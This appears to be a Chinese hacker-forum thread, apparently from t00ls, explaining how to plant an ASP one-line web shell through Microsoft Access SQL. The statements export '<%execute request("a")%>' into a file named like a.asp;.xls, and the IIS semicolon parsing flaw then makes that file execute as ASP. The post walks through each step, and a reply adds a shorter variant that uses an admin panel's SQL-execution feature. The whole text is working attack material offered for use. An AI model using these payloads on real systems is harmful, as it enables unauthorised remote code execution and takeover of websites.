create table cmd (a varchar(50)) insert into cmd (a) values ('<%execute request("a")%>') select * into [a] in 'f:\host\qhdyxt\web\a.asp;.xls' 'excel 4.0;' from cmd drop table cmd
解释如下: 1.create table a (a varchar(50)) 建立一个有一个A字段的表 表名为a 字段类型为字符 长度为50 2.insert into a (a) values ('<%execute request("a")%>') 在表a的a字段插入密码为a的一句话木马 3.select * into [a] in 'F:\jt\work\a.asp;.xls' 'excel 4.0;' from a 把表a的内容导出为物理路径的一个 EXCEL文件,为什么用excel文件,因为ACCESS数据库不允许导出其他危险格式。我们导出为EXCEL后在利用IIS解析漏洞就可以变成我们的小马了。很*的说~~ 4.drop table a 丢家伙闪人 射完就走!
小弟的提问,没两分钟大家就回答了,强烈顶t00ls牛淫。
这个更简单:
Access利用后台SQL执行命令功能导出WebShell: SELECT '<%execute request("a")%>' into [vote] in 'd:\web\x.asp;.xls' 'excel 8.0;' from vote 后台提供SQL执行功能且知道绝对路径方可使用(vote为已知表段)